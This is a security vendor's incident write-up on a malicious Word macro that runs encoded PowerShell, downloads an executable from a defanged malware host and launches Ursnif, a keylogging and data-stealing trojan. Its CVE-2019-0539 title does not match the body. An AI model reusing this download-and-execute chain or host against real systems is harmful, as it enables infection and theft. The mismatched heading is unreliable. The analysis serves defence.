CVE-2019-0539 Root Cause Analysis
Perception Point’s platform recently caught an advanced threat directed at one of our customers within a Microsoft Word file. Our Incident Analysis report below provides a detailed understanding of the attack and the damage it could have caused. Key observations regarding this attack:
One of our customers received an email that had been flagged “malicious” by Perception Point’s platform. This report includes a “what-if” analysis to examine the potential effect of the attack, in case the malicious file had not been blocked.
Perception Point’s engines identified the malicious activity by tracking down Macro commands. We noticed the following anomalies: the macro is obfuscated and the code itself is too long for no legitimate reason. The command lines as extracted by Perception Point’s platform
1. Researching the Word .doc file in a contained environment shows that the macro runs an encrypted PowerShell command. 2. The PowerShell is base64 encoded. 3. Once the first layer decoded, the resulting payload is as follows: 4. For the purpose of this analysis, we removed the last command “invoke-expression”, to prevent any actual malicious activity and then ran the command: 5. The PowerShell script downloads an .exe file from hxxp://zzajqwnewq.com/GGKO/chibura.php?l=anz9.yarn, renames it with a random name, saves it in a temp folder, and then executes it.
TrojanSpy:Win32/Ursnif. TrojanSpy:Win32/Ursnifis a generic malware family that contains capabilities such as keylogging*, data theft, C&C. *) A “Keylogger” (denotes for “keystroke logger”) is a computer software that tracks or logs the keys struck on your keyboard, typically in a covert manner so the user does not know that his/her actions are being monitored. This is usually done with malicious intent to collect the user’s account information, credit card numbers, usernames, passwords, and other private data.
This attack could have been very damaging for our customer, as it was well-disguised and very effective once released. Learn more about how our hardware-assisted platform is able to catch such attacks here: OUR TECHNOLOGY
From uncovering a VBS backdoor that quotes the Fibonacci sequence to receiving “trust worthy” emails.
What is phishing exactly, how the technique works and how to prevent it.